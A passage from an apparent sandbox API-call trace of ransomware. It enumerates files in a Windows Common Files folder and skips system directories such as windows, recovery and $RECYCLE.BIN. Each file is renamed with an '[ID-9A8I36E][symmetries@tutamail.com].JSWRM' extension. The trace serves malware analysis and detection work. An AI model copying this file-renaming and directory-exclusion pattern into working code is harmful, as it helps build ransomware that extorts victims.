CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado26.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado26.tlb", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado26.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.154] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9168140271392888) returned 0 [0069.154] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.154] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.154] CloseHandle (hObject=0xffffffff) returned 1 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0069.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ede0 [0069.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.155] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msado26.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0069.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.155] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11600, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msado27.tlb", cAlternateFileName="")) returned 1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2=".") returned 1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2="..") returned 1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2="...") returned 1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2="windows") returned -1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2="recovery") returned -1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2="perflogs") returned -1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2="documents and settings") returned 1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2="system volume information") returned -1 [0069.155] lstrcmpiW (lpString1="msado27.tlb", lpString2="msocache") returned -1 [0069.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado27.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado27.tlb", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado27.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0069.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado27.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado27.tlb", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado27.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0069.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.155] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.156] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9173809628223608) returned 0 [0069.156] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.156] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.156] CloseHandle (hObject=0xffffffff) returned 1 [0069.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0069.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0069.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0069.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0069.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23fa98 [0069.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.157] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0069.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.157] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c6f28a5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4c6f28a5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4c6f28a5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msado28.tlb", cAlternateFileName="")) returned 1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2=".") returned 1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2="..") returned 1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2="...") returned 1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2="windows") returned -1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2="recovery") returned -1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2="perflogs") returned -1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2="documents and settings") returned 1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2="system volume information") returned -1 [0069.157] lstrcmpiW (lpString1="msado28.tlb", lpString2="msocache") returned -1 [0069.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado28.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado28.tlb", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado28.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado28.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado28.tlb", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado28.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.158] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.158] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9172778836071008) returned 0 [0069.158] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.158] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.158] CloseHandle (hObject=0xffffffff) returned 1 [0069.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0069.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0069.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f5f8 [0069.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.159] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0069.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.159] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c6f28a5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4c6f28a5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4c6f28a5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msado60.tlb", cAlternateFileName="")) returned 1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2=".") returned 1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2="..") returned 1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2="...") returned 1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2="windows") returned -1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2="recovery") returned -1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2="perflogs") returned -1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2="documents and settings") returned 1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2="system volume information") returned -1 [0069.159] lstrcmpiW (lpString1="msado60.tlb", lpString2="msocache") returned -1 [0069.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado60.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado60.tlb", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado60.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado60.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado60.tlb", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado60.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.160] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.160] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9173294232147968) returned 0 [0069.160] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.161] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.161] CloseHandle (hObject=0xffffffff) returned 1 [0069.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: 